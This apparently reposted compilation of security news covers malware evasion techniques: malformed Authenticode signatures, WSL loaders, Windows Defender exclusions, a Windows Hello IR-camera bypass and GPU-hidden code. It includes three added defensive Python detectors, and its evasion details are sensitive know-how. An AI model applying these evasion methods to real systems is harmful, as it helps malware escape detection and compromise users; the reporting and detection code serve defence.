Hackers Discover Technique to Make Malware Undetectable on Windows

 

Security researchers have disclosed a novel technique that a threat actor uses to deliberately evade detection by applying malformed digital signatures to its malware payloads.

In a report published on Thursday, Neel Mehta of Google's Threat Analysis Group said the attackers created malformed code signatures that Windows treats as valid but that OpenSSL code cannot decode or check.

OpenSUpdater, a known family of unwanted software that downloads and installs other suspicious programs on affected computers, was found to be using the new technique. The campaign's targets included users in the U.S. who are likely to download pirated games and other gray-area software.

These conclusions are based on OpenSUpdater samples that have been uploaded to VirusTotal since at least mid-August.

Adversaries have previously relied on illegally obtained digital certificates to sign malware and unwanted software, or have embedded attack code in digitally signed software components by poisoning the supply chain. OpenSUpdater stands out because it deliberately uses malformed signatures to slip past defenses.

"This is the first time TAG has observed actors using this technique to evade detection while preserving a valid digital signature on PE files," Mehta said. 

"Code signatures on Windows executables provide guarantees about the integrity of a signed executable, as well as information about the identity of the signer. Attackers who can obscure their identity in signatures without affecting the integrity of the signature can avoid detection longer and extend the lifetime of their code-signing certificates to infect more systems." 

The artifacts are signed with an invalid leaf X.509 certificate that has been modified so that the 'parameters' element of the SignatureAlgorithm field contains an End-of-Content (EOC) marker rather than a NULL tag. Products that use OpenSSL to extract signature information reject this encoding as invalid, yet checks on Windows PCs allow the file to run without any security warning.
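The encoding difference described above can be checked directly in the DER bytes. The following is an added example, not code from Google TAG or from the original post: it walks a DER blob and reports every AlgorithmIdentifier whose parameters are `00 00` (EOC) where `05 00` (NULL) is expected. The sample input is a constructed certificate-shaped skeleton, not a real certificate, and all function names are hypothetical.

```python
"""Flag AlgorithmIdentifier structures whose 'parameters' element is an
End-of-Content marker (00 00) instead of ASN.1 NULL (05 00)."""

TAG_EOC, TAG_NULL, TAG_OID, TAG_SEQUENCE = 0x00, 0x05, 0x06, 0x30


class DerError(ValueError):
    """Raised when the input is not well-formed definite-length DER."""


def read_tlv(buf, pos, end):
    """Parse one TLV header at pos; return (tag, value_start, value_end)."""
    if pos + 2 > end:
        raise DerError("truncated header at offset %d" % pos)
    tag, first = buf[pos], buf[pos + 1]
    if tag & 0x1F == 0x1F:
        raise DerError("high-tag-number form is not supported")
    pos += 2
    if first < 0x80:                      # short form: length in one byte
        length = first
    else:                                 # long form: next n bytes hold the length
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > end:
            raise DerError("indefinite, oversized or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > end:
        raise DerError("value overruns its parent")
    return tag, pos, pos + length


def children(buf, start, end):
    """Yield (tag, offset, value_start, value_end) for each TLV in a range."""
    pos = start
    while pos < end:
        tag, vstart, vend = read_tlv(buf, pos, end)
        yield tag, pos, vstart, vend
        pos = vend


def decode_oid(body):
    """Decode OBJECT IDENTIFIER content bytes into dotted notation."""
    arcs, value = [], 0
    for byte in body:
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:               # last byte of this sub-identifier
            if not arcs:                  # first one packs the first two arcs
                first = min(value // 40, 2)
                arcs += [first, value - 40 * first]
            else:
                arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)


def find_eoc_parameters(der):
    """Return [(offset, oid)] for each SEQUENCE { OID, EOC } in the blob."""
    findings = []

    def walk(start, end):
        for tag, offset, vstart, vend in children(der, start, end):
            if not tag & 0x20:            # primitive: nothing nested to inspect
                continue
            kids = list(children(der, vstart, vend))
            if (tag == TAG_SEQUENCE and len(kids) == 2
                    and kids[0][0] == TAG_OID
                    and kids[1][0] == TAG_EOC and kids[1][2] == kids[1][3]):
                findings.append((offset, decode_oid(der[kids[0][2]:kids[0][3]])))
            walk(vstart, vend)

    walk(0, len(der))
    return findings


# --- constructed sample input (not a real certificate) ---------------------
SHA256_RSA_OID = bytes.fromhex("2a864886f70d01010b")  # 1.2.840.113549.1.1.11


def tlv(tag, body):
    """Encode a short-form TLV (body under 128 bytes) for the sample."""
    return bytes([tag, len(body)]) + body


def sample_certificate(params):
    """Skeleton: SEQUENCE { tbs { serial, algId }, algId, BIT STRING }."""
    alg_id = tlv(TAG_SEQUENCE, tlv(TAG_OID, SHA256_RSA_OID) + params)
    tbs = tlv(TAG_SEQUENCE, tlv(0x02, b"\x01") + alg_id)
    return tlv(TAG_SEQUENCE, tbs + alg_id + tlv(0x03, b"\x00\xaa"))


if __name__ == "__main__":
    for label, params in (("NULL", b"\x05\x00"), ("EOC", b"\x00\x00")):
        print(label, find_eoc_parameters(sample_certificate(params)))
```

The walker reads the bytes without a strict ASN.1 library, which matters here because strict decoders reject exactly the encoding being looked for.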

New Malware Variant Employs Windows Subsystem for Linux for Attacks

 

Security experts have found a new malware variant that uses the Windows Subsystem for Linux (WSL) to infect systems covertly. The research highlights that malicious actors are exploring new attack tactics and focusing on WSL to avoid being detected.

Black Lotus Labs, the threat research arm of Lumen Technologies, reported on Thursday, September 16, that it had detected many malicious Python files compiled in the ELF (Executable and Linkable Format) binary format for Debian Linux.

The first samples built for the WSL environment were found at the beginning of May, and new ones continued to appear every two to three weeks until August 22. They function as WSL loaders and have very low detection rates on public file-scanning services. The next step is injecting the malware into a running process using Windows API calls, a method that is neither new nor advanced.

Of the few samples discovered, only one came with a publicly routable IP address, suggesting that the attackers are testing WSL as a way to install malware on Windows. The malicious files rely mostly on Python 3 to carry out their tasks and are packaged with PyInstaller as ELF executables for Debian.

“As the negligible detection rate on VirusTotal suggests, most endpoint agents designed for Windows systems don’t have signatures built to analyze ELF files, though they frequently detect non-WSL agents with similar functionality,” Black Lotus Labs said.

Just over a month ago, one of the malicious Linux files was recognized by only one antivirus engine on VirusTotal. Rescanning another sample showed that the engines on the scanning service still failed to detect it.

One of the variants, written entirely in Python 3, does not use any Windows API and is the first attempt at a WSL loader. It uses standard Python libraries, so it works on both Windows and Linux.

Microsoft released the Windows Subsystem for Linux in April 2016. In September, when WSL had just come out of beta, researchers from Check Point disclosed a technique they called Bashware, in which WSL could be misused to hide malicious code from security products.

Based on inconsistencies observed while analyzing multiple samples, the researchers theorize that the code is still under development, albeit in the final stage. The limited public IP exposure points to activity restricted to targets in Ecuador and France at the end of June and the beginning of July.

Black Lotus Labs recommends that anyone who has WSL enabled make sure that logging is active so that these intrusions can be detected.

Linux Implementation of Cobalt Strike Beacon Employed by Hackers in Attacks Worldwide

 

Security researchers have detected an unofficial Linux version of the Cobalt Strike Beacon, created by malicious actors, that is actively being used in attacks against organizations worldwide. Cobalt Strike is a legitimate penetration testing tool built as attack infrastructure for red teams (security professionals who act as attackers to find security gaps and flaws in their own organization's infrastructure).

Malicious actors also commonly use Cobalt Strike (often seen in ransomware campaigns) for post-exploitation tasks after planting so-called beacons, which provide persistent remote access to compromised machines. Using beacons, attackers can later access compromised servers to collect data or deploy additional malware payloads.

Over time, cybercriminals obtained and circulated cracked copies of Cobalt Strike, making it one of the most common tools in attacks that end in data theft and extortion. Cobalt Strike, however, has always had one limitation: it supports only Windows devices and does not include Linux beacons.

In a new analysis, researchers at the security company Intezer describe how the threat actors built their own Cobalt Strike-compatible Linux beacon. Using these beacons, malicious actors can now maintain and exercise remote control over both Windows and Linux devices.

The previously undetected variant of the penetration testing tool, dubbed "Vermilion Strike," is one of the rare Linux ports of what has traditionally been a Windows-based red team tool, one heavily used by adversaries to launch a range of targeted attacks. Cobalt Strike bills itself as threat emulation software, with Beacon being the payload designed to model a sophisticated actor and duplicate their post-exploitation behavior.

"The stealthy sample uses Cobalt Strike's command-and-control (C2) protocol when communicating to the C2 server and has remote access capabilities such as uploading files, running shell commands, and writing to files," Intezer researchers said in a report. 

Once installed, the malware runs in the background and decodes the configuration the beacon needs to operate. It then fingerprints the compromised Linux machine and communicates with a remote server over DNS or HTTP to retrieve base64-encoded, AES-encrypted commands, which let it write files and upload them back to the server.

"Vermilion Strike and other Linux threats remain a constant threat. The predominance of Linux servers in the cloud and its continued rise invites APTs to modify their toolsets to navigate the existing environment," the researchers said.

PRIVATELOG Relies on Common Log File System to Evade Detection

 

Researchers have revealed details about a new malware family that uses the Common Log File System (CLFS) to conceal a second-stage payload in registry transaction files in order to avoid detection. The malware, named PRIVATELOG, and its installer, STASHLOG, were discovered by FireEye's Mandiant Advanced Practices team. Details about the threat actor's identity and motivations are still unknown.

CLFS (Common Log File System) is a general-purpose logging subsystem for producing high-performance transaction logs that is available to both kernel-mode and user-mode applications. It debuted with Windows Server 2003 R2 and has since been incorporated into subsequent Windows operating systems. CLFS can be used for event logging as well as data logging. TxF and TxR employ CLFS to save transactional state changes before committing a transaction. No built-in Windows utility can examine the Binary Log File(s) created by CLFS.

CLFS's goal, like that of any other transactional logging system, is to record a series of steps required for a particular activity so that they can be accurately replayed in the future to commit the transaction to secondary storage or undone if necessary.

The malware has yet to be found in real-world attacks aimed at consumer environments or seen launching any second-stage payloads. Mandiant believes PRIVATELOG is still in development, might be the work of a researcher, or could be used in a highly targeted attack.

“Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files. This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions. This is similar in nature to malware which may rely, for example, on the Windows Registry or NTFS Extended Attributes to hide their data, which also provide locations to store and retrieve binary data with the Windows API,” explained Mandiant researchers.

PRIVATELOG and STASHLOG have features that allow malicious software to remain undetected on infected machines, such as the use of obfuscated strings and control flow techniques that are specifically designed to make static analysis difficult. 

Mandiant researchers examined a PRIVATELOG sample that is an un-obfuscated 64-bit DLL named prntvpt.dll, with exports similar to those found in legitimate prntvpt.dll files. PRIVATELOG expects to be loaded from PrintConfig.dll by hijacking the search order used to load DLLs. Mandiant provides YARA rules to detect PRIVATELOG and STASHLOG, as well as their variants.

Hackers are Selling Tool to Hide Malware in GPUs

 

Cybercriminals are moving towards malware attacks that can execute code from a hacked system's graphics processing unit (GPU). Although the approach is not new, and demo code has been published in the past, most of the projects to date have come from academics or were unfinished and unpolished. 

In August, a proof-of-concept (PoC) was sold on a hacker forum, perhaps signaling hackers' shift to a new level of complexity in their attacks.

Code Tested on Intel, AMD, and Nvidia GPUs

In a brief post on a hacking forum, someone offered to sell the proof-of-concept (PoC) for a strategy that keeps harmful code protected from security solutions scanning the system RAM. The seller gave a brief description of their technique, claiming that it stores malicious code in the GPU memory buffer and then executes it from there. 

According to the advertiser, the project only works on Windows PCs that support OpenCL 2.0 and above for executing code on various processors, including GPUs. The advertiser also stated that the code had been tested on Intel (UHD 620/630), Radeon (RX 5700), and GeForce (GTX 740M(?), GTX 1650) graphics cards.

Few details are available about this new technique. The post went live on August 8, and the PoC was apparently sold for an unknown amount on August 25.

Another hacker forum user mentioned that GPU-based malware had been done before, citing JellyFish, a six-year-old proof-of-concept for a Linux-based GPU rootkit.

The vendor dismissed the links to the JellyFish malware, stating that their approach is unique and does not rely on code mapping to userspace. There is no information regarding the transaction, such as who purchased it or how much they paid. Only the seller's post claims that the malware was sold to an unidentified third party.

Academic Study

Researchers at the VX-Underground threat repository stated in a tweet on Sunday that the malicious code allows binary execution by the GPU in its memory region. They also noted that the technique will be demonstrated soon. 

PoCs for a GPU-based keylogger and a GPU-based remote access trojan for Windows were also disclosed by the same researchers that created the JellyFish rootkit. All three projects were released in May 2015 and are open to the public. 

While the mention of the JellyFish project implies that GPU-based malware is a new idea, the foundation for this attack approach was developed around eight years ago. 

Researchers from the Institute of Computer Science - Foundation for Research and Technology (FORTH) in Greece and Columbia University in New York demonstrated in 2013 that GPUs can execute a keylogger and save recorded keystrokes in their memory space.

The researchers had previously demonstrated that malware authors can use the GPU's processing capabilities to pack code with extremely sophisticated encryption methods considerably faster than the CPU can.

ShadowPad Malware is Being Sold Privately to Chinese Espionage

 

Since 2017, five separate Chinese threat groups have used ShadowPad, an infamous Windows backdoor that allows attackers to download additional harmful modules or steal data. In a detailed overview of the malware, SentinelOne researchers Yi-Jhen Hsieh and Joey Chen said that "adoption of ShadowPad significantly reduces the costs of development and maintenance for threat actors," adding that "some threat groups stopped developing their own backdoors after they gained access to ShadowPad." 

ShadowPad was released in 2015 as a replacement for PlugX. However, it wasn't until several well-known supply-chain incidents – CCleaner, NetSarang, and ShadowHammer – that it began to gain considerable public attention. Unlike the publicly available PlugX, ShadowPad is only available to a selected group of people. ShadowPad has been called a "masterpiece of privately sold malware in Chinese espionage" by an American cybersecurity firm. 

ShadowPad is a shellcode-based modular backdoor. A layer of obfuscated shellcode loader is in charge of decrypting and loading a Root plugin during execution. As part of its chain of operations, the Root plugin decrypts other plugins embedded in the shellcode and loads them into memory. To date, at least 22 different plugins have been discovered.

In addition to the plugins that are included, more can be uploaded remotely from the C&C server, allowing users to dynamically add functionality that isn't present by default. The infected machines are managed through a Delphi-based controller, which is used for backdoor communications, upgrading the C2 infrastructure, and controlling the plugins.

"While ShadowPad is well-designed and highly likely to be produced by an experienced malware developer, both its functionalities and its anti-forensics capabilities are under active development," the researchers said. 

ShadowPad-related attacks have lately targeted Hong Kong-based firms as well as key infrastructure in India, Pakistan, and other Central Asian countries. Although it is predominantly attributed to APT41, the implant is known to be shared by multiple Chinese espionage actors, including Tick, RedEcho, RedFoxtrot, and clusters dubbed Operation Redbonus, Redkanku, and Fishmonger.

"The threat actor behind Fishmonger is now using it and another backdoor called Spyder as their primary backdoors for long-term monitoring, while they distribute other first-stage backdoors for initial infections including FunnySwitch, BIOPASS RAT, and Cobalt Strike," the researchers said. "The victims include universities, governments, media sector companies, technology companies and health organizations conducting COVID-19 research in Hong Kong, Taiwan, India and the U.S."

BHUSA: Windows Hello Passwordless Bypass Disclosed

 

Passwords are often a weak spot in security, which is why alternatives like Microsoft Hello, which gives a passwordless approach to authentication, are gaining popularity. While Windows Hello promises a more protected experience than conventional passwords, it is a method that could itself be circumvented.

Speaking at Black Hat USA on August 5, Omer Tsarfati, a security researcher from CyberArk, described a complete attack chain that he used to circumvent Windows Hello. The problems of using regular passwords, according to Tsarfati, are well understood. They are frequently weak and readily crackable, are vulnerable to phishing attempts, and many users reuse passwords across different sites.

The central idea behind passwordless authentication is that, instead of a password, another kind of authentication technology is used to log on to a system. Biometrics, such as fingerprint scanning or face recognition, can be used in passwordless methods.

Windows Hello is Microsoft's version of a passwordless approach, which launched in Windows 10. Among other things, Windows Hello lets users get access to a system with face recognition.

Tsarfati determined that he would need a separate camera to figure out how to get around Windows Hello's face recognition. To that end, he purchased an NXP evaluation board, which can connect to a Windows PC through USB and act as a camera.

Tsarfati's objective was to have the USB device replicate what a genuine Windows system camera would offer to Windows Hello in order to discover what the system is actually processing as it decides whether or not to grant access.

He found that Windows Hello requires cameras to have an infrared (IR) sensor. For Windows Hello to work, the camera must be capable of transmitting both color frames and IR frames.

"Windows Hello doesn't really pay attention to anything that you're sending in the color frames. It's only relying on the infrared, I sent frames of SpongeBob and it worked," Tsarfati stated. 

An attacker would just need a customized USB device that imitates a camera to bypass Windows Hello. That USB gadget would then have to be capable of transmitting an infrared picture, which could be acquired from a victim. 

Tsarfati did not go into considerable detail about how a would-be attacker would go about capturing an IR image from a victim, but he did show with his own IR image how the Windows Hello bypass works.

The vulnerability was officially recognized as CVE-2021-34466, which Microsoft patched in July after Tsarfati and CyberArk responsibly revealed it to Microsoft in March of this year.

Fake Windows 11 Installers are Being Used to Spread Malware

 

Although Windows 11 isn't expected to be released until later this year, hackers have already begun attempting to use it to infect victims with malware. On Friday, security firm Kaspersky warned that crooks were using bogus installers to take advantage of consumers eager to get their hands on the Microsoft operating system update, which is set to be released in the fall. 

“Although Microsoft has made the process of downloading and installing Windows 11 from its official website fairly straightforward, many still visit other sources to download the software, which often contains unadvertised goodies from cybercriminals (and isn’t necessarily Windows 11 at all),” Kaspersky wrote. The sarcastic "goodies" include anything from harmless adware to password stealers and trojans. 

An executable file called 86307 windows 11 build 21996.1 x64 + activator.exe is one example. It certainly appears credible, with a file size of 1.75GB. However, the majority of that space is taken up by a single DLL file that contains a lot of irrelevant data. 

When you run the application, the installer seems to be a standard Windows installation wizard. Its primary function is to download and execute a more intriguing executable. The second executable is likewise an installer, with a license agreement that describes it as a “download manager for 86307 windows 11 build 21996.1 x64 + activator” and notes that it will also install some sponsored applications. If you accept the agreement, your computer will be infected with a number of malicious programmes. 

It's not uncommon for hackers to take advantage of victims' demand for a product or service, whether it's coronavirus contact tracing apps or the Telegram encrypted messaging app. In late June, Microsoft announced Windows 11 and made an initial “insider preview” accessible. Security has been highlighted as a key driving factor in the development of the operating system upgrade. 

The bogus installers are proliferating as Microsoft battles a number of security threats directed at the firm. Last week, Microsoft revealed instructions on how to protect against the "PetitPotam" attack, which might allow attackers to take control of Windows domains, as well as a solution for the "SeriousSAM" vulnerability, which could let attackers get administrative access. Last week, the corporation also issued a warning about LemonDuck, a cryptocurrency mining malware that has been targeting Microsoft devices. 

LemonDuck Targets Windows and Linux Systems

 

LemonDuck started out mainly as a cryptocurrency botnet that used infected machines for mining, but it was later transformed into a malware loader, which brings us to Microsoft's current update on this malevolent digital duck loaded with citrus.

Microsoft warns users that the LemonDuck crypto-mining malware targets both Windows and Linux and spreads through phishing, exploits, USB devices, and brute-force attacks, as well as attacks that exploit a serious Exchange Server vulnerability detected in March.

In May, two years after the first bug appeared, the group was found to be using Exchange bugs to mine cryptocurrency.

Notably, during periods when security teams are concentrating on fixing severe flaws, and even eradicating competing spyware, the group behind LemonDuck makes use of high-profile weaknesses.

A LemonDuck infection can have grave repercussions. According to Microsoft, LemonDuck's capabilities include stealing key credentials from Windows and Linux PCs; removing security controls, which leaves the system defenseless; spreading via email (probably spearphishing attempts); and installing back doors on devices to enable further remote code execution (RCE).

Malware researchers from Cisco's Talos have also been tracking the group's Exchange activity. They observed that, before loading payloads such as the Cobalt Strike pentesting kit, a popular lateral movement tool, LemonDuck used automated tools to scan for, detect, and exploit server software, which allows the malware to download additional modules.

Microsoft's post on the matter says, “(LemonDuck) uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others — and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using Covid-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems.”

Microsoft also revealed that although the attackers initially focused predominantly on China, India is now among the top ten countries most affected by this malware. Specifically, India is among the top six countries targeted by the cybercriminals, alongside the USA, Russia, China, Germany, and Great Britain, with manufacturing and IoT businesses being the main targets.

The risk is also heightened by the expanding malware architecture, which makes the cybersecurity sector even more vulnerable to these attacks. 

Microsoft also mentions the use of LemonCat, a distinct yet equally harmful and highly developed targeted malware tool that is often used to install backdoors on systems through RCE attacks.

Further, Microsoft’s threat intelligence team states, “The threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.”

This New Malware Hides Itself Among Windows Defender Exclusions to Avoid Detection

 

On Tuesday, security experts confirmed the existence of a previously undocumented malware strain named "MosaicLoader," which targets people looking for cracked software as part of a global campaign. 

Bitdefender researchers stated in a report shared with The Hacker News, "The attackers behind MosaicLoader created a piece of malware that can deliver any payload on the system, making it potentially profitable as a delivery service." 

"The malware arrives on target systems by posing as cracked installers. It downloads a malware sprayer that obtains a list of URLs from the C2 server and downloads the payloads from the received links." 

The malware's name comes from its complex internal structure, which is designed to avoid reverse engineering and escape investigation. MosaicLoader attacks employ a well-known malware delivery technique known as search engine optimization (SEO) poisoning, in which hackers buy ad slots in search engine results to elevate their harmful URLs to the top of the results when users search for keywords linked to pirated software. 

Following a successful infection, the Delphi-based dropper, which masquerades as a software installer, serves as the entry point: it retrieves next-stage payloads from a remote server and adds local Windows Defender exclusions for the two downloaded executables in an effort to circumvent antivirus scanning.

It's important to note that such Windows Defender exclusions can be found in the registry keys listed below: 

1. File and folder exclusions - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths

2. File type exclusions - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions

3. Process exclusions - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes

One of the binaries, "appsetup.exe," is designed to attain system persistence, while the second, "prun.exe," is a downloader for a sprayer module that can obtain and deploy a range of attacks from a list of URLs, ranging from cookie stealers to cryptocurrency miners, and even more advanced implants like Glupteba. 
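One way to audit the three exclusion keys listed above is to diff a `reg export` of the Exclusions key against an approved baseline. This is an added example, not code from Bitdefender or the original post; the sample export is constructed, the directory names and the baseline entry are assumptions, and only the registry key names and the two executable names come from the post.

```python
import re

# Registry location named in the post; its three subkeys hold the exclusions.
EXCLUSION_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions"
SUBKEYS = {"paths": "file/folder", "extensions": "file type", "processes": "process"}

KEY_LINE = re.compile(r"^\[(.+)\]$")                 # [HKEY_...\Some\Key]
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=')    # "value name"=data


def parse_exclusions(reg_text):
    """Return [(kind, value_name)] for every exclusion in a .reg export."""
    entries, kind = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = KEY_LINE.match(line)
        if key:
            parent, _, leaf = key.group(1).rpartition("\\")
            in_scope = parent.lower() == EXCLUSION_ROOT.lower()
            kind = SUBKEYS.get(leaf.lower()) if in_scope else None
            continue
        value = VALUE_LINE.match(line)
        if value and kind:
            # .reg files escape backslashes and quotes inside value names
            entries.append((kind, re.sub(r"\\(.)", r"\1", value.group(1))))
    return entries


def unexpected_exclusions(reg_text, approved):
    """Return the exclusions that are not in the approved baseline."""
    baseline = {item.lower() for item in approved}
    return [(kind, name) for kind, name in parse_exclusions(reg_text)
            if name.lower() not in baseline]


# Constructed sample export (directories are made up for illustration).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\Settings]
"C:\\NotAnExclusion"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\\BuildAgent\\work"=dword:00000000
"C:\\Example\\Downloads\\appsetup.exe"=dword:00000000
"C:\\Example\\Downloads\\prun.exe"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"C:\\Example\\Downloads\\prun.exe"=dword:00000000
"""

APPROVED = {r"C:\BuildAgent\work"}   # assumed baseline for this example

if __name__ == "__main__":
    for kind, name in unexpected_exclusions(SAMPLE_EXPORT, APPROVED):
        print("unapproved %s exclusion: %s" % (kind, name))
```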

Because of MosaicLoader's broad capabilities, compromised systems can be co-opted into a botnet, which the threat actor can then use to spread a variety of malicious software, including both publicly available and customized malware, to gain, expand, and manage unauthorized access to victim computers and networks. 

The researchers added, "The best way to defend against MosaicLoader is to avoid downloading cracked software from any source."

Besides the fact that using cracked software is against the law, cybercriminals look to target and exploit users searching for illegal software, the researchers said, adding that it is essential to check the source domain of every download to make sure that the files are legitimate.

By Fooling a Webcam, Hackers were Able to get Past Windows Hello

 

Biometric authentication is a critical component of the IT industry's plan to eliminate the need for passwords. However, a new method for fooling Microsoft's Windows Hello facial recognition technology demonstrates that a little hardware tinkering can make the system unlock when it shouldn't.

Face-recognition authentication has become more prevalent in recent years thanks to services like Apple's FaceID, with Windows Hello driving usage even further. Face recognition by Hello is compatible with a variety of third-party webcams. 

Windows Hello facial recognition works only with webcams that have an infrared sensor in addition to the conventional RGB sensor. However, it turns out that the system doesn't even look at RGB data. The researchers discovered that by using a single straight-on infrared image of a target's face and a black frame, they were able to unlock the victim's Windows Hello–protected device. By manipulating a USB webcam to produce an attacker-chosen image, the researchers were able to fool Windows Hello into thinking the device owner's face was present and unlocking.

“We tried to find the weakest point in the facial recognition and what would be the most interesting from the attacker’s perspective, the most approachable option,” says Omer Tsarfati, a researcher at the security firm CyberArk. “We created a full map of the Windows Hello facial-recognition flow and saw that the most convenient for an attacker would be to pretend to be the camera because the whole system is relying on this input.”

Microsoft dubbed the discovery a "Windows Hello security feature bypass vulnerability" and patched the problem on Tuesday. Furthermore, the company recommends that users use "Windows Hello enhanced sign-in security," which employs Microsoft's "virtualization-based security" to encrypt Windows Hello facial data and process it in a secure area of memory. 

Tsarfati, who will present the findings at the Black Hat security conference in Las Vegas next month, says the CyberArk team focused on Windows Hello's facial-recognition authentication because there has already been a lot of research into PIN cracking and fingerprint-sensor spoofing in the industry. 

He goes on to say that the team was also drawn by the large number of Windows Hello users. Microsoft said in May 2020 that the service had over 150 million users. In December, Microsoft announced that 84.7 percent of Windows 10 users utilize Windows Hello to log in.

Cybercriminals Unleashing Malware for Apple M1 Chip

 

Apple Macs are becoming more popular in the workplace, and the number of malware variants targeting macOS is increasing as well. However, the M1, Apple's new system-on-a-chip, has produced a new generation of macOS-specific malware that anti-malware tools, threat hunters, and researchers must swiftly learn to recognize and, eventually, fight. Historically, most macOS malware has been reused from Windows malware variants. But when employees set up home offices as a result of the pandemic's shift to work-from-home, more Macs entered business environments, making them a more valuable target for attackers targeting enterprises.

Apple's new ARM64-based microprocessor, the M1, has already witnessed an increase in malware types created expressly for it, according to Mac security specialist Patrick Wardle. "As attackers evolve and change their ways, we as malware analysts and security researchers need to stay abreast of that as well.” In 2020, around half of all macOS malware, such as adware and nation-state attack code, may have migrated from Windows or Linux. 

M1 offers faster and more efficient processing, graphics, and battery life, and is now available in Apple's new Macs and iPad Pro. It also has several new built-in security mechanisms, such as one that protects the computer from remote exploitation and another that protects physical access. 

According to a recent Malwarebytes survey, Windows malware detections are down 24% among business users, while Mac malware detections are up 31%. Wardle discovered in his research that when he separated the binaries for macOS malware into two categories, one for Intel-based Macs and the other for M1-based Macs, anti-malware systems detected the Intel-based malware more successfully than the M1-based malware, despite the fact that the binaries are "logically the same." 

For the M1 malware, their detection rate dropped by 10%. That's a clue, he says, that existing antivirus signatures are mostly for the Intel edition of the macOS malware, rather than the M1 variant. Because static analysis alone can fail, detections should also use behavior-based technology. 
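The gap Wardle describes can be checked per sample by listing the architecture slices in a Mach-O file and hashing each one separately, since the Intel and arm64 builds of the same code have different bytes. The following is an added example, not Wardle's tooling; the function names and the sample bytes are constructed for illustration, and the "signatures cover Intel only" set is an assumption.

```python
import hashlib
import struct

FAT_MAGIC = 0xCAFEBABE      # universal ("fat") header, fields stored big-endian
MH_MAGIC_64 = 0xFEEDFACF    # thin 64-bit Mach-O, little-endian on both CPUs
CPU_TYPES = {0x01000007: "x86_64", 0x0100000C: "arm64"}


def macho_slices(data):
    """Return [(arch, offset, size)] for every architecture slice in the image."""
    if len(data) < 8:
        raise ValueError("too short for a Mach-O header")
    magic, count = struct.unpack_from(">II", data, 0)
    if magic == FAT_MAGIC:
        # Java class files share this magic; there the field is a version >= 45.
        if not 0 < count <= 20:
            raise ValueError("implausible slice count, not a universal binary")
        slices = []
        for i in range(count):
            base = 8 + 20 * i
            if base + 20 > len(data):
                raise ValueError("truncated fat_arch table")
            cputype, _sub, offset, size, _align = struct.unpack_from(">5I", data, base)
            if offset + size > len(data):
                raise ValueError("slice extends past end of file")
            slices.append((CPU_TYPES.get(cputype, hex(cputype)), offset, size))
        return slices
    magic, cputype = struct.unpack_from("<II", data, 0)
    if magic == MH_MAGIC_64:
        return [(CPU_TYPES.get(cputype, hex(cputype)), 0, len(data))]
    raise ValueError("not a 64-bit Mach-O or universal binary")


def unscanned_slices(data, signature_archs):
    """Slices whose architecture the signature set does not cover, with SHA-256."""
    gaps = []
    for arch, offset, size in macho_slices(data):
        if arch not in signature_archs:
            digest = hashlib.sha256(data[offset:offset + size]).hexdigest()
            gaps.append((arch, digest))
    return gaps


def build_sample():
    """Constructed two-slice universal image: headers plus filler, not a real binary."""
    intel = struct.pack("<II", MH_MAGIC_64, 0x01000007) + b"A" * 24
    arm = struct.pack("<II", MH_MAGIC_64, 0x0100000C) + b"B" * 24
    first, second = 64, 64 + len(intel)
    header = struct.pack(">II", FAT_MAGIC, 2)
    header += struct.pack(">5I", 0x01000007, 3, first, len(intel), 0)
    header += struct.pack(">5I", 0x0100000C, 0, second, len(arm), 0)
    return header.ljust(first, b"\0") + intel + arm


if __name__ == "__main__":
    sample = build_sample()
    print(macho_slices(sample))
    # Assumption: the scanner's signatures were written for Intel builds only.
    print(unscanned_slices(sample, {"x86_64"}))
```

A slice reported by `unscanned_slices` is one that hash or byte-pattern signatures built from the Intel build will not match, which is where behavior-based detection has to carry the load.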

It's a matter of honing malware analysts' and threat hunters' skills to the new Apple silicon, he says. With reverse-engineering abilities and an awareness of the ARM64 instruction set, he says he wants to "empower Mac analysts, red teams, and everyone in cybersecurity." Wardle says, "The M1 system actually does significantly improve security at the hardware level, but it's transparent to the everyday user."

POC Exploit Posted Online Leaks Dangerous Microsoft Bug Info

 

A PoC (proof-of-concept) exploit was posted online this Tuesday for a Windows Print Spooler service vulnerability that can allow an attacker to fully compromise Windows systems. Tracked as CVE-2021-1675, the vulnerability was patched by Microsoft earlier this month in the June 2021 security updates. 

The Record says "however, in what looks to have been an accident, an in-depth technical write-up and a fully working PoC exploit were shared on GitHub earlier today. The GitHub report has been taken offline after a few hours, but not before it was cloned by several other users." 

The vulnerability affects Print Spooler (spoolsv.exe), a Windows feature that works as a generic universal interface between apps, local or networked printers, and the Windows OS, and that lets app developers print jobs easily. Windows has been providing this service since the 90s, but it is one of the most buggy processes of the operating system, with many bugs being found throughout the years, "such as PrintDemon, FaxHell, Evil Printer, CVE-2020-1337, and even some of the zero-days used in the Stuxnet attacks," the Record says. 

The latest bug, CVE-2021-1675, joins the long line of Print Spooler bugs and was first found by researchers at Tencent Security, NSFOCUS, and AFINE earlier this year. 

